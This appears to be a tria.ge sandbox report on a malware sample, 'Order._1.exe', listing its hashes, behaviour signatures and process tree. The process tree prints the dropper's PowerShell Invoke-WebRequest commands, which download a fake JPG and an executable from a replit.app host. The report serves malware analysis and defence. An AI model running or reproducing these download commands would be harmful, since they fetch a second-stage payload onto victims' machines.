Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
- max time kernel: 120s
- max time network: 121s
- platform: windows7_x64
- resource: win7-20240705-en
- resource tags: arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
- submitted: 30/07/2024, 09:10
Static task: static1
Behavioral task: behavioral1
Sample: Order._1.exe
Resource: win7-20240705-en
General
- Target: Order._1.exe
- Size: 288KB
- MD5: 587be0c9be93274c3d38ef27c3a50aa4
- SHA1: 6808c0da1276c7ad2021ffb7c0b8d743f5c87b35
- SHA256: cf4ff6cb9038c130e7b6d76daf2af62d018541c3d561d5e0aba8a34614ebc5d8
- SHA512: 5d2dbadb93ae2d91c3e7af58be9b28a7270a86b1c3b2bfbae64f232a06f26efa72162dc4adb22ce1f269429eecb2d4b5b44e1c1494658de702c1f2dad0c9c879
- SSDEEP: 3072:Cq6+ouCpk2mpcWJ0r+QNTBf2Wk1qXkXRA4XTZ5N:Cldk1cWQRNTB+l8KN
Malware Config
Signatures
- pid / Process: 2316 powershell.exe; 2696 powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- System Location Discovery: System Language Discovery (1 TTPs, 1 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (process Order._1.exe)
- Suspicious behavior: EnumeratesProcesses (2 IoCs)
  pid / Process: 2316 powershell.exe; 2696 powershell.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Token: SeDebugPrivilege (pid 2316, powershell.exe)
  Token: SeDebugPrivilege (pid 2696, powershell.exe)
- Suspicious use of WriteProcessMemory (10 IoCs)
  PID 2004 wrote to memory of 1656 (pid 2004, process Order._1.exe, procid_target 29)
  PID 2004 wrote to memory of 1656 (pid 2004, process Order._1.exe, procid_target 29)
  PID 2004 wrote to memory of 1656 (pid 2004, process Order._1.exe, procid_target 29)
  PID 2004 wrote to memory of 1656 (pid 2004, process Order._1.exe, procid_target 29)
  PID 1656 wrote to memory of 2316 (pid 1656, process cmd.exe, procid_target 31)
  PID 1656 wrote to memory of 2316 (pid 1656, process cmd.exe, procid_target 31)
  PID 1656 wrote to memory of 2316 (pid 1656, process cmd.exe, procid_target 31)
  PID 1656 wrote to memory of 2696 (pid 1656, process cmd.exe, procid_target 33)
  PID 1656 wrote to memory of 2696 (pid 1656, process cmd.exe, procid_target 33)
  PID 1656 wrote to memory of 2696 (pid 1656, process cmd.exe, procid_target 33)
Processes
- C:\Users\Admin\AppData\Local\Temp\Order._1.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Order._1.exe"
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID: 2004
  - C:\Windows\system32\cmd.exe
    Command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F602.tmp\F603.tmp\F604.bat C:\Users\Admin\AppData\Local\Temp\Order._1.exe"
    - Suspicious use of WriteProcessMemory
    PID: 1656
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2316
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"
      - Command and Scripting Interpreter: PowerShell
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      PID: 2696
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 336B
  MD5: 01c5cda0bd57d42a84beff225913c7f6
  SHA1: 1047c8ce097c87214b5337c98278f4ce5a5896f7
  SHA256: 454734ff80f0ff62344d6adeaf700983b1d5da605d192226e3a1e40020ec0d31
  SHA512: 76af6d488d7fdf8d701d16e0c884811df4c7a7bf34b74c30f7e993490420ebb895889048ae9ec5ca82d037f49de42028fca751d66915df543cd4394fcff727b2
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 4642b21b8f12258876c2f6beddddadeb
  SHA1: 221ff71c5ad1aca6f3740d70bbe5b4de9546661e
  SHA256: e47fa23763f1f09c4e23e5268ff518ad20e92a38914225903a14180e8691774b
  SHA512: a3d38076bbab1ed78caf58e09867f70bd1ca4e0ef11388edf3a72943139694aa4529ba141ff426f02080bbc6c977a5f128a0e27d70f4821023fae492e12915f4